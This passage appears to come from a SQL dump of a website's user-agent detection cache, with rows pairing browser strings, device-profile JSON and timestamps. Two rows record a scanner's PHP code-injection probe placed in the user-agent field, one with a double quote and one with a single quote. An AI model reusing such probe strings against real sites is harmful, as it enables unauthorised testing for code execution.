220333QNY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1669732295),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G991B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1702045050),('Mozilla/5.0 (Linux; Android 5.*; Y18) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1669986912),('Mozilla/5.0 (Linux; Android 13; SM-S908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1692872705),('Mozilla/5.0 (Linux; Android 11; JAD-LX9; HMSCore 6.8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1670152221),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1698668914),('Mozilla/5.0 (Linux; Android 13; IN2025) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":845,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1670671686),('Mozilla/5.0 (Linux; Android 10; EML-L29; HMSCore 6.8; GMSCore 22.46) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1670774769),('Mozilla/5.0 (Linux; Android 13; SM-G781B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1691589973),('Mozilla/5.0 (Linux; Android 12; 2201117TY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1671623694),('Wappalyzer','',1671648353),('Mozilla/5.0 (Linux; Android 13; SM-G780G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1741865655),('Mozilla/5.0 (Linux; Android 12; SM-A236B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1671776952),('Mozilla/5.0 (Linux; Android 13; SM-G996B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679250974),('Mozilla/5.0 (Linux; Android 13; SM-A528B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1697879639),('Mozilla/5.0 (Linux; Android 13; SM-A336B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1689498226),('Mozilla/5.0 (Linux; Android 13; Pixel 7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1671902896),('Mozilla/5.0 (Linux; Android 12; 21091116UG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1671905680),('Mozilla/5.0 (Linux; Android 13; SM-G780F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1677233859),('Mozilla/5.0 (Linux; Android 12; SM-A125F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1709978951),('Mozilla/5.0 (Linux; Android 13; SM-A536B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1704636655),('Mozilla/5.0 (Linux; Android 13; LE2123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":858,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1672416496),('Mozilla/5.0 (Linux; Android 12; M2004J19C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1673689694),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1706592277),('Mozilla/5.0 (Linux; Android 7.*; HUAWEI NXT-TL00) AppleWebKit/* (KHTML, like Gecko) Chrome','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1672929692),('Mozilla/5.0 (Linux; Android 12; SM-T225) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1673035336),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G996B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1696476577),('Mozilla/5.0 (Linux; Android 11; SM-T725) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1709808373),('Mozilla/5.0 (Linux; Android 13; SM-A515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1739017374),('Mozilla/5.0 (Linux; Android 13; SM-A326B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679574338),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A715F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1704553849),('Mozilla/5.0 (Linux; Android 13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1733591150),('Mozilla/5.0 (Linux; Android 13; SM-N770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1674301624),('Mozilliqa\"<?=print(9347655345-4954366);?>','',1674322520),('Mozilliqa\'<?=print(9347655345-4954366);?>','',1674322521),('Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748017331),('Mozilla/5.0 (Linux; Android 13; SM-S901B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1723788347),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G990B2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1705520552),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A226B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":857,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1710790747),('Mozilla/5.0 (Linux; Android 12; CPH2113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1674493836),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A528B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1705136780),('Mozilla/5.0 (Windows; MSIE 7.0; Macintosh; Trident/5.0; Intel Mac OS X 11_2_1)','',1674561584),('Mozilla/5.0 (Linux; Android 12; M2003J15SC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1727109851),('Mozilla/5.0;Windows NT 6.1; rv:35.0; Gecko/* Firefox/*','',1674586788),('QR Scanner Android','',1742885988),('Mozilla/5.0 (Linux; Android 13; SM-A525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1718979121),('Mozilla/5.0 (Linux; Android 13; SM-F711B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":880,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1687372077),('Mozilla/5.0 (Linux; Android 12; Nokia G20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1675018422),('Mozilla/5.0 (Android 13; Mobile) Firefox/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1734351519),('Mozilla/5.0 (Linux; Android 12; RMX2155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1675113319),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708714473),('Mozilla/5.0 (Linux; Android 13; KB2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1693999699),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G780G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1706356255),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G990B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1696916527),('Opera/9.80 (Android 3.*; Linux; Opera Tablet) Presto/2.9','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1675582215),('Mozilla/5.0 (Linux; Android 12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile DuckDuckGo/5 Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1675878009),('Mozilla/5.0 (Linux; Android 10; V350U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1675905913),('Mozilla/5.0 (compatible; MSIE 6.0; 68K; Trident/3.0)','',1675943359),('Mozilla/5.0 (Linux; Android 13; SM-A325F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1721592532),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A325F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1699087881),('Mozilla/5.0 (Linux; Android 13; SM-T976B) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1676485545),('Mozilla/5.0 (Linux; Android 13; SM-G990B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681503683),('Mozilla/5.0 (Linux; Android 12; AC2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1740307024),('Mozilla/5.0 (Linux; Android 10; SM-T720) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":711,\"screenHeight\":1138,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1676913897),('Mozilla/5.0 (Linux; Android 13; SM-A725F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1691070673),('Mozilla/5.0 (Linux; Android 12; 2201116PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1677094154),('Mozilla/5.0 (Linux; Android 9; O2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1677241476),('Mozilla/5.0 (Linux; Android 13; 2201122G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1677413929),('Mozilla/5.0 (Linux; Android 13; SM-S908U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1677503095),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1677833501),('Mozilla/5.0 (iPhone14,3; CPU iPhone OS 15 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1677612907),('Mozilla/5.0 (Linux; Android 9; Fire) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1677666370),('Wordupindexinfo1/0','',1691648110),('Mozilla/5.0 (Linux; Android 11; moto g power (2022)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":876,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1695078571),('Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1686573780),('Mozilla/5.0 (Linux; Android 13; SM-F721B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":880,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1682148111),('Mozilla/5.0 (iPad; CPU OS 16 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748024014),('Mozilla/5.0 (Linux; Android 13; SM-A226B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":857,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1691236723),('Mozilla/5.0 (Linux; Android 13; SM-G990B2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1697878204),('Mozilla/5.0 (Linux; Android 13; SM-G985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678209037),('Mozilla/5.0 (Linux; Android 13; 21081111RG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681998889),('Mozilla/5.0 (Linux; Android 12; 2201117SY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1682951379),('Mozilla/5.0 (Linux; Android 13; SM-A137F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690007678),('Mozilla/5.0 (Linux; Android 13; SM-X205) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678386466),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A536B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1723647290),('Mozilla/5.0 (Linux; Android 13; SM-A225F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678438384),('Mozilla/5.0 (Linux; Android 6.*; MX6) AppleWebKit/* (KHTML, like Gecko) Chrome','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678544433),('Mozilla/5.0 (Linux; Android 13; SM-A715F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1736775793),('Mozilla/5.0 (Linux; Android 13; SM-S911B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1738330469),('Mozilla/5.0 (Linux; Android 12; SM-T505) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678856929),('Mozilla/5.0 (Linux; Android 11; 220333QPG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1678943682),('Mozilla/5.0 (Linux; Android 12; DN2103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679404397),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G990B2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1710520219),('Mozilla/5.0 (iPhone; CPU OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* 